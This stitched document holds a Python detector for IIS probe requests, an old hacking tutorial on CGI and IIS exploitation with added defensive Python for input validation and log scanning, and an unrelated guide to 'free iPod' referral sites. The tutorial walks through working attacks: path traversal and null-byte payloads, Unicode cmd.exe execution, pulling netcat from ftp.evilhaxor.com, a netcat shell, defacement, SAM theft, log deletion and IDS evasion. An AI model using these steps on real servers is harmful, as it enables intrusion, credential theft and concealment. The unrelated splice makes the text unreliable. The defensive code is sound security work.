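# Each pattern is one of the request shapes listed in the guide above;
# the tag names are invented for this example. Patterns are lowercase
# because classify() lowercases the request before matching.
INDICATORS = {
    "asp-trailing-dot":      re.compile(r"\.asp\.(\?|$)"),
    "ads-source-disclosure": re.compile(r"::\$data"),
    "htr-source-disclosure": re.compile(r"\+\.htr$|( |%20){3,}.*\.htr$"),
    "ism-dll-probe":         re.compile(r"/scripts/iisadmin/"),
    "iisadmpwd-probe":       re.compile(r"/iisadmpwd/"),
    "rds-probe":             re.compile(r"/msadc/msadcs\.dll"),
    "sample-showcode":       re.compile(r"/(codebrws|showcode)\.asp\?.*source="),
    "asp-shell":             re.compile(r"\|shell\("),
    "idq-template-read":     re.compile(r"\.idq\?.*citemplate="),
    "upload-probe":          re.compile(r"cpshost\.dll\?publish|/scripts/upload[nx]?\.asp"),
    "frontpage-pwd":         re.compile(r"/_vti_pvt/.*\.pwd$"),
}


def classify(request):
    """Return the sorted tags whose pattern matches the request either as
    received or after one percent-decoding pass (both lowercased)."""
    forms = {request.lower(), unquote(request).lower()}
    return sorted(tag for tag, pat in INDICATORS.items()
                  if any(pat.search(form) for form in forms))


def scan(requests):
    """Map each flagged request to its tags; clean requests are omitted."""
    flagged = {}
    for req in requests:
        tags = classify(req)
        if tags:
            flagged[req] = tags
    return flagged


# Constructed request list built from the guide's examples plus one clean hit.
SAMPLE_REQUESTS = [
    "/default.htm",
    "/default.asp.",
    "/index.asp::$DATA",
    "/global.asa+.htr",
    "/msadc/msadcs.dll",
    "/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../../boot.ini",
    '/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\\")|',
    "/_vti_pvt/service.pwd",
    "/query.idq?CiTemplate=../../../boot.ini",
]

if __name__ == "__main__":
    for req, tags in scan(SAMPLE_REQUESTS).items():
        print(req, "->", ", ".join(tags))
```

On a server that has had the samples, the app mappings for .htr/.idc/.stm/.ida/.idq and the _vti_ directories removed, every one of these should be a 404 in the log; the value of the tags is telling you that someone is walking the list, not that the request succeeded.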


--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external
applications to the web server. A CGI program is executed in real time and
is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed
anywhere. The programs can be written in most languages but typically they are
written in C, Perl or shell scripts.

Many sites will use freely available, downloadable scripts from places like
Matt's Trojan, erm, I mean Matt's Script Archive. It's always a good idea to
look through the source of the scripts for bad system calls and lax input
validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read
the following tutorials... they explain it better than I ever could:

Hacking CGI - http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt
Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07

Just to get you in the mood we will have a brief look at CGI exploitation.
There are three main types of CGI hacking; URL encoding attacks, input
validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit CGI
using the techniques from previous sections. First, we need to cover some
background. CGI can take lots of shapes and forms. One popular use is via
web-based forms that submit information to a CGI via a GET or POST.



When the user clicks on the submit button his information is passed to the
CGI script to process either via the URL (GET) or via HTTP headers (POST).
Let's assume that the CGI we are going to exploit asks the user for the name
of a file to display. The 'GET' method uses the URL to pass the information
and it would look like this:

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd

Let's break that down:

? - separates the request from the parameters
filename - this is the name of the textbox in the html
= - assignment for the parameter/value pair
/etc/passwd - this is what the user typed into the box

You can have multiple fields within a HTML form and these will also be
passed to the CGI. They are separated using a '&':

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle

If you were thinking about how you could alter the user-supplied input to
break the CGI then good, you're starting to think in terms of security. Lots
of developers love to program new and interesting things but they do not
consider security. A security-conscious programmer would write input
validation routines that process the data and ensure the user isn't being
malicious or curious.

As you read through some of the free scripts on the web you will start to
realise that many programmers do not think about security. Let's look briefly
at some ways we could exploit the CGI. The first thing to keep in mind is
that you already know the generic exploits from the previous section. The
only area in which we are lacking is programming-language-specific info.

We will stick with the example CGI that opens a file (and let's assume
it's written in Perl). Let's look at some of the things we can try:

my_cgi.pl?filename=../../../../../etc/passwd

and let's do the same thing but encode the URL to bypass security checks:

my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with
poison null bytes. Stop now and go read it... can't be arsed? ok then,
here's the quick version. %00 is valid in a string with Perl but is NUL
in C. So? When Perl wants to open the file it makes a request to the
operating system through a system call. The operating system is written in
C and %00 is a string delimiter. Lets apply this technique to the
following situation.

I decide to secure my CGI. I append '.html' to any request. This means that
the user can only view html files and if they try something else then it
doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

my_cgi.pl?filename=../../../../etc/passwd%00

In Perl the filename string would look like this:

"../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is
passed to the OS (which is written in C not Perl) the request looks like
this:

"../../../../etc/passwd"

The OS identifies %00 as the string delimiter and ignores anything that
comes after it. The web server then displays the /etc/passwd file... bugger :-(
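To show the defender's side of the traversal, encoding and null-byte tricks above (and of the GET query-string format explained earlier), here is an added example that is not part of the original tutorial and is not the my_cgi script itself. It is written in Python rather than Perl, the base directory /srv/cgi-pages is a hypothetical value, and the URLs it checks are the ones used in this section. It parses the query string, percent-decodes each value strictly so that the overlong %c0%af form fails to decode instead of turning into '/', rejects NUL bytes before any suffix is appended, refuses path separators and '..', and finally confirms that the canonicalised target still sits inside the base directory:

```python
"""Hardened handling of the 'filename' parameter for a file-serving CGI.

Added example: Python rather than Perl, base directory is a hypothetical
/srv/cgi-pages. The request URLs in __main__ are the ones from the text.
"""
import os
from urllib.parse import unquote_to_bytes, urlsplit


class RejectedInput(ValueError):
    """Raised when a user-supplied value fails validation."""


def decode_param(raw):
    """Percent-decode one query component, insisting on well-formed UTF-8.

    Python's UTF-8 codec refuses non-shortest-form sequences such as %c0%af,
    so the encoded traversal variant is rejected here instead of becoming '/'.
    """
    try:
        return unquote_to_bytes(raw).decode("utf-8")
    except UnicodeDecodeError as exc:
        raise RejectedInput("malformed UTF-8 in parameter: %s" % exc)


def parse_query(query):
    """Split 'a=b&c=d' into a dict, decoding each key and value strictly."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[decode_param(key)] = decode_param(value)
    return params


def safe_resolve(base_dir, filename):
    """Return the absolute path of <base_dir>/<filename>.html, or raise.

    1. no NUL byte: the poison null byte would truncate the C string the OS
       sees, discarding the '.html' suffix appended below
    2. no path separators or '..' anywhere, so only a plain basename survives
    3. after appending '.html' and canonicalising, the target must still sit
       inside base_dir (belt and braces for symlinks or an odd base_dir)
    """
    if "\x00" in filename:
        raise RejectedInput("NUL byte in filename")
    if not filename or filename in (".", ".."):
        raise RejectedInput("empty or dot filename")
    if "/" in filename or "\\" in filename or ".." in filename:
        raise RejectedInput("path separators or '..' not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename + ".html"))
    if os.path.commonpath([base, target]) != base:
        raise RejectedInput("resolved path escapes base directory")
    return target


def handle_request(url, base_dir="/srv/cgi-pages"):
    """Process one GET URL; return ('ok', path) or ('rejected', reason)."""
    try:
        params = parse_query(urlsplit(url).query)
        return "ok", safe_resolve(base_dir, params.get("filename", ""))
    except RejectedInput as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    for url in (
        "http://www.target.com/cgi-bin/my_cgi.cgi?filename=index&user=fugjostle",
        "my_cgi.pl?filename=../../../../../etc/passwd",
        "my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd",
        "my_cgi.pl?filename=../../../../etc/passwd%00",
    ):
        print(url, "->", handle_request(url))
```

Run stand-alone it prints a verdict for each of the section's example URLs. Each check closes a different hole: appending '.html' on its own is defeated by %00, a plain string blacklist on its own is defeated by encoding, and the realpath containment test catches anything the first two let through.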

Many people download scripts from the web and look for problems in the
script. Then the wily hax0r will go to AltaVista and search for sites
that are using that script, e.g.:

url:pollit.cgi

and good old altavista provides a list of sites that are just ripe for the
taking.

The final method of exploiting CGI is via buffer overflows. Languages like
Java and Perl are immune to buffer overflows because the language looks
after memory management. Programs written in a language such as C are
vulnerable because the programmer is supposed to manage the memory. Some
programs fail to check the size of the data they are copying into a memory
buffer and overwrite adjacent data on the stack.

The goal of the buffer overflow is to overwrite the instruction pointer
which points to the location of the next bit of code to run. An attacker
will attempt to overwrite this pointer with a new pointer that points to
attacker's code, usually a root shell.

Quite a few CGIs exist that are vulnerable to this type of attack. For
example, counter.exe is one such CGI. Sending 2000 A's to the CGI causes
a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document.
Look out for a future release ;-)

If you want to dig deeper in buffer overflows then have a look at:

http://www.phrack.com/phrack/49/P49-14


--[On the seventh day, God chilled and haxored the planet]

Well.. I guess it's time we actually tried some of the things discussed but
I'm not going to cover everything. I suggest going to the following URLs
and searching for IIS:

http://www.securityfocus.com/
http://www.packetstormsecurity.com/

My main reason for doing this file was to better understand Unicode exploits
and so that is going to be the focus of the exploitation. The first exploit
I'm going to go through is the recent Unicode exploit for IIS4/5:

http://www.securityfocus.com/bid/1806

Before I get emails saying "hold on, you said that %xx%xx is UTF-8" let me
explain. This had wide exposure on Bugtraq as the Unicode exploit. In
reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep
calling this the Unicode exploit because it's now referenced by this name in
the Bugtraq archives and you'll have to search using Unicode to do further
research.

Ok, rant over... To check if the server is exploitable, request the
following URL:

http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

You should get a directory listing of the C:\ drive on the target server.
The important thing to note is that the Unicode string can vary depending
where in the world you are. Some possible alternatives include:

%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or
research UTF-8 for more alternatives.
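As an added, defender-side example (not from the original text), the following Python checks web-server log lines for the non-shortest-form ("overlong") UTF-8 sequences this section is about, together with the '..' and cmd.exe indicators in the test URL above. The log lines are constructed here in a W3C extended-log style layout and are not real IIS output; the field order is an assumption. The detector does not decode the overlong forms at all: it only needs to know that certain lead bytes can never begin a shortest-form sequence, which is what a correct UTF-8 decoder enforces and a lenient one does not.

```python
"""Detect non-shortest-form (overlong) UTF-8 and traversal in request logs.

Added example: the log lines below are constructed in a W3C extended-log
layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status); the
field order is an assumption, not a real IIS log.
"""
import re
from urllib.parse import unquote_to_bytes

SAMPLE_LOG = """\
2000-10-17 10:01:02 10.0.0.5 GET /default.htm - 200
2000-10-17 10:01:09 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2000-10-17 10:01:15 10.0.0.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir+c:\\ 200
2000-10-17 10:02:30 10.0.0.7 GET /images/logo.gif - 304
2000-10-17 10:03:01 10.0.0.7 GET /caf%c3%a9.html - 404
"""


def overlong_sequences(data):
    """Return the offsets of lead bytes that start a non-shortest-form sequence.

    UTF-8 requires the fewest bytes that can hold the code point, so:
      * 0xC0 and 0xC1 can never lead a sequence (two bytes for U+0000-U+007F),
      * 0xE0 must be followed by a continuation byte >= 0xA0,
      * 0xF0 must be followed by a continuation byte >= 0x90.
    A decoder that accepts these forms is what lets %c0%af stand in for '/',
    which is the weakness described above. A correct decoder rejects them.
    """
    hits = []
    for i, b in enumerate(data):
        nxt = data[i + 1] if i + 1 < len(data) else None
        if b in (0xC0, 0xC1):
            hits.append(i)
        elif b == 0xE0 and nxt is not None and 0x80 <= nxt < 0xA0:
            hits.append(i)
        elif b == 0xF0 and nxt is not None and 0x80 <= nxt < 0x90:
            hits.append(i)
    return hits


def inspect_line(line):
    """Return the findings for one log line; an empty list means clean."""
    fields = line.split(" ")
    if len(fields) < 7:
        return ["unparseable line"]
    stem, query = fields[4], fields[5]
    raw_stem = unquote_to_bytes(stem)      # decode once, inspect the raw bytes
    raw_query = unquote_to_bytes(query)
    findings = []
    if overlong_sequences(raw_stem):
        findings.append("overlong UTF-8 in URI stem")
    if b".." in raw_stem or b".." in raw_query:
        findings.append("'..' path component")
    if re.search(rb"cmd\.exe", raw_stem, re.IGNORECASE):
        findings.append("cmd.exe referenced in URI")
    return findings


def scan_log(text):
    """Map 1-based line numbers of suspicious lines to their findings."""
    report = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.strip():
            findings = inspect_line(line)
            if findings:
                report[lineno] = findings
    return report


if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG).items():
        print("line %d: %s" % (lineno, ", ".join(findings)))
```

The benign line with %c3%a9 (a correctly encoded 'é') is not flagged, which is the point of checking the structure of the bytes rather than grepping for any percent-encoded high byte. Since the request is decoded before the rules run, the same rules fire whichever encoding variant from the list above was used.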

OK, you can read the directory... what next? You have the directory listing
and the ability to run commands, so you need to find the web root. By default,
the web root is at:

c:\inetpub\wwwroot\

If it's not there then go and look for it. Let's write a text file there and
see if we can see it:

cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

hmmm.. it seems that we don't have write access. Ok, no problem we can get
around that by creating a copy of the cmd.exe that has write privileges:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe

Let's check if it worked:

http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\

Yep.. all's good so far. Lets try and write to the web root:

fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

Let's open it up in the browser and see if we can see it:

http://target.com/test.txt

w00t!!! Write access!!! Right, we now have some options open to us. In the
words of Microsoft, where do you want to go today? Working via the URL is
pretty clunky and I like the comfort of a nice command prompt, so let's do
that. I want to bring over a copy of netcat and a nice html page that I'll
use to replace the existing one.

First I need to think about the script I want to run that will get the
files I need from my FTP server:

fugscript:
open ftp.evilhaxor.com
anonymous
anon@microsoft.com
cd pub
get nc.exe
get hacked.html
quit

Right. I need to get this script onto the webserver:

fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript
fug.exe?/c+echo%20anonymous>>fugscript
fug.exe?/c+echo%20anon@microsoft.com>>fugscript
fug.exe?/c+echo%20cd%20pub>>fugscript
fug.exe?/c+echo%20get%20nc.exe>>fugscript
fug.exe?/c+echo%20get%20hacked.html>>fugscript
fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. Next step
is to execute the script and get my files from my web server.

fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files
transferred. Be patient and give it time to transfer. Now you are ready to
get netcat listening on a port. The command line for starting netcat is:

nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e)
when someone connects. The last step is to translate this command into URL
speak ;-):

fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and
voila... you have a cmd prompt. I really hate web defacements... so if you're
going to do it then rename the existing index.htm (or default.htm) to
something like index.htm.old (give the poor admin a break, cause you can bet
your arse that he hasn't made a backup). ALSO: you are now using a system
without authorisation and as such, you are guilty under the Computer Misuse
Act in the UK and probably of something similar in your own country. If it
never occurred to you to delete the contents of c:\winnt\system32\logfiles
or the 'fugscript' file then you really shouldn't be doing this.



It just wouldn't be right to talk about IIS exploitation without mentioning
msadc.pl. rfp's perl script is a perfect example of exploit chaining. A
single exploit is not used but a chain of exploits to get the script to
work.

The exploit utilises a combination of inadequate application input validation
and default install fun. The process tries to connect to a Data Source Name
(DSN) to execute commands.

rfp's script tests for the existence of /msadc/msadc.dll using the GET method.
This test will be logged and you should edit the script to make it a HEAD
request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME
separator string. It is advised to change this string as some IDSs are
configured to identify this string.

If you want to write your own scanners then you should be looking for
headers with the content type:

application/x-varg

and of course the IIS version :-) I don't want to go into too much detail
because this is heavily documented on rfp's site:

http://www.wiretrip.net/rfp/

How do I use it? I hear you cry... well, its child's play:

./msadc2.pl -h www.target.com

If all goes well then you should be presented with the following:

command:

It's interesting to note at this point that 'cmd /c' is run, as with the
previous exploit. You can edit the script to run any other executable, such
as 'rdisk /s', instead.

This is good, you can now enter the command you want to run on the server.
The previous Unicode exploit should have given you some ideas but here's a
couple that come to mind:

Example 1:
copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak

(grabbing fug.hak via your browser should give you a nice file to fire up
in L0phtcrack or JTR)

Example 2:
echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript
&& echo mypassword>>fugscript... etc. etc.

Anyway, that's about all for now. When I can be bothered I'll add some more
methods to this file. Until then, ensure your box is fully patched and the
default scripts are removed. Go have a look at the following URL and get
secure:

http://www.microsoft.com/security/

***************************************************************************
Greetz to: ReDeeMeR, BarnseyBoy, Reeferman, gabbana, think12, Wang, Enstyne,
[502BOP], Muad_Dib, Macster, n0face, palmito, kph, Homicide, Col,
Axem, Booto, _Penguin, nsh, Chawmp, shad, hellz and everyone in
#CA who are way too numerous to mention.
***************************************************************************


Guide For Getting Free Stuff

If you are like me you have heard so much about the FreeIpods and FreeFlatScreens websites on different forums, blogs, IM's, etc, you are about to puke. So am I. But yet the draw of getting an Ipod for doing basically nothing is pretty strong. I dismissed all the "stories" of people getting their ipods as the marketing machine at work. However, when Kevin Rose published that not only did he receive his, but a few of his friends did as well, I figured I might take a chance and give it a go. Today I received proof that it does indeed work. Yep, I got my iPod.

Whats in it for them?
Step 1. Collect Names.
Step 2. Send those names items worth $200 or more
Step 3. ?????
Step 4. Profit

Before I signed up, I wanted to get to the bottom of the ?????. I didn't want any sweaty, filth pushing webmonkeys to have all my info, so I did my research. Gratis Internet, the parent company of the FreeIpods, FreeFlatscreens, etc. sites, recently did an interview with Wired Magazine.
In this article Gratis states that they are acting as head hunters for companies (more on that later) and are paid between $50-$90 per referral. Although this seems like a lot of money, this is nothing compared to what these companies spend for print advertising, which does not guarantee ANY customers. So now we know what ?????? equals. ??????=$50-$90 for Gratis per guaranteed customer (referral sites).

How Does it Work?
You sign-up on one (or more) of the following websites:

http://www.FreeMiniMacs.com/?r=14098976
This site gives away free Mini Macs. At the time of this writing only the 80gb MiniMac was available.

http://www.FreeDesktopPC.com/?r=13082204
This site gives away free flat screen monitors and TVs. At the time of this writing the following flat screens were available: Sony 19" LCD, Samsung 15" SyncMaster 510MP LCD TV, Samsung SyncMaster 710N LCD Monitor, Sony 27" FD Trinitron WEGA TV, or a 24" Toshiba TV/VCR/DVD combo

http://www.FreeGamingSystems.com/?r=12660654
This site gives away gaming systems. At the time of this writing the Slim PS2, Xbox, Nintendo Gamecube, and Nintendo DS were available.

http://www.FreeHandbags.com/?r=13950244
This site gives away high-end handbags. Might be a good surprise for your wife or girlfriend. =) At the time of this writing the following bags were available: Prada Mini-Hobo (black, Pink, Powder Blue), Burberry Novacheck Minisling, Coach Signature Demi Pouch (black, camel, purple), Kate Spade Pia Pochette (Black, Pink, Red)

http://www.mp3players4free.com/default.aspx?r=82419
This site gives out free mp3 players. You can get paypal $275, ipod, rio carbon, iriver, ipod mini.

http://www.dvrs4free.com/default.aspx?r=90581
This site gives away TiVo, Replay TV, and $275 paypal.

http://www.macminis4free.com/default.aspx?r=181183
Another mini mac site.

http://www.cameras4free.com/default.aspx?r=90773
This site is giving away high end digital cameras. At the time of writing this, the following cams are available: Canon Powershot S1 IS, Sony DSC-P100, Sony DSC-W1, Canon Powershot A95, $325 paypal.


Ok, so here is the tricky part. Once you sign up with one of these websites, you have to complete an "offer" from Gratis's advertisers. There are numerous offers, some being better than others. Now remember the ???? = $50 - $90 equation? In order for you to receive your ipod/Flatscreen/Desktop PC/Handbag you have to refer 5, 8, or 10 of your friends, and they have to complete one of the offers as well. Then in order for them to receive theirs they need to refer others, and so on. So let's just look at why they are going to send an Ipod to you. (1(you) + 5(your friends)) x $90 = $540 - $250(ipod) = $290 profit for them just for you signing up. The advertisers are more than willing to pay, and FreeIpods is more than happy to send you your ipod. Works out for everyone.

What is the basic "lingo"?
"ref"/"referral" = The thing required to get your free items. These are your friends.
"green" = Status indicator that means your offer has been completed.
"yellow" = Status indicator that means your offer has yet to be completed or is in the process/pending.
"hold" = Means your account has been suspended or stopped. DON'T CHEAT.
"STV" = Means your product has been "Shipped To Vendor". You should receive it in about 10 days time.

What process should you use to sign up (to ensure that you will get your item)
When signing up, it is recommended that you use Internet Explorer (sucks); some people have reported problems using other browsers (e.g. Firefox, Opera, etc.). Also make sure you have cookies enabled.

1. Click on one of the links above and enter a VALID US mailing address.

2. Complete the marketing survey. Note: your answers do not have any impact on you receiving your item. Just say no to them.

3. Once you have signed up, you should receive a verification email. If you did not receive one, go to the "My Account" page and click the link to have them resend it. If you still did not get it check your spam folder.

4. Sign-up with one of their partners and complete the offer. (see the section which offer should I choose) It can take up to 15 days for your offer to show completed. (A term that we freebie goers use for a "completed offer" is called "credit.") But usually they show completed after 24 hours. Be patient. If it doesn't show up as completed, you can email the site with proof and confirmation for signing up and they will give you credit.


Which offer should I choose?
Just so you know, all offers require a credit card, **HOWEVER** not all of them cost anything! =) Here is a list of my recommended offers; I have not had any problems whatsoever with doing these.

* Video Professor: This requires a credit card and pay only $3 shipping for computer tutorial CDs. After you receive the CDs, just call customer support and cancel your membership. Return to sender the CDs and they will refund you the shipping costs.

* Complete Home: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Lowes Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Buyer's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Circuit City Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Great Fun: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Walkie Talkie just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Traveler's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Thin Digital Camera just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* eFax Plus: Sign up for their fax service. You get a 30 day free trial. Upon receiving credit for doing the offer, simply cancel the service within the free trial and pay nothing! It usually take 1-3 days to receive credit for this offer.

* Blockbuster Online: Try a two week trial of Blockbuster's Netflix-like service. Cancel online within trial time and pay nothing.

*Zooba: If you are a book fan, sign up for this offer. You get a book for $10 with free shipping. Instant verification.

*Various Credit Card offers: Apply for a credit card and get approved. When it arrives, cut it up and toss it out. Nothing to cancel, nothing to pay, and free stuff to gain!

Many of these offers are from big companies, so you do not have to question the legitimacy of signing up under them. In other words, you will be safe because you are giving your credit card information to AOL, Blockbuster, and General Motors, and I highly doubt that they will sell this info.

These are free, as long as you cancel within the trial period. Some offer online cancellations while others require calling their support number. Just tell them that you dont find yourself using their services enough so you want to cancel and they'll cancel your membership without any problems.

Cheating
Many of these free sites take cheating very seriously. If you want your free gift and don't want your account suspended, simply DON'T CHEAT! Don't refer yourself and do all the offers yourself. If you think you can cheat the system because you are a 1337 h4x0r and you can use proxies and IP spoofs to refer yourself, DON'T DO IT. When you are in the approval stage, they will intensely and thoroughly examine your account and make sure that all your referrals are legit and unique. Trust me, I know many people who have gotten suspended for attempting to cheat.

Multiple Accounts
This goes under cheating. It is wise not to create multiple accounts under the same site because it is against the free site's TOS. They suspend you no matter what your reason is, even if it was an accident. This also includes referring family members. You can only create one account under one household, under one IP address per site. So you cannot refer mother, sister, or brother to do it unless they live in another household.

So you've run out of offers to do. What do I do?
Ok, if you are a freebie freak, you will probably eventually run out of offers to do, because you signed up for so many free sites and did all the easy free offers. What should you do? Remember that free sites give you credit for a unique signup for the offers. So if you signed up for the Blockbuster Online offer at freeflatscreens, you cannot do it again for another free site such as freedesktoppc. But there is a trick to this. A unique signup = a unique credit card that you used to sign up. So if you have another credit card, you can sign up for the offer again. Another method is to purchase a Visa gift card from your mall, or go to www.webcertificate.com and purchase a virtual debit/credit card and do the offers with those.

If you followed all these steps correctly, your free gift will be delivered to your doorstep in no time.

Here are the steps:
1. Getting friends to sign up under you
2. Approval Stage: They will analyze your account for fraud. Takes 1 week.
3. Pending Stage: Your account has been approved. You are now processing. This will take 1-2 weeks.
4. STV: Sent to Vendor. Your product will arrive in 10 days.
5. Shipped: Congrats!

Most of these freebie sites are for U.S. residents only.
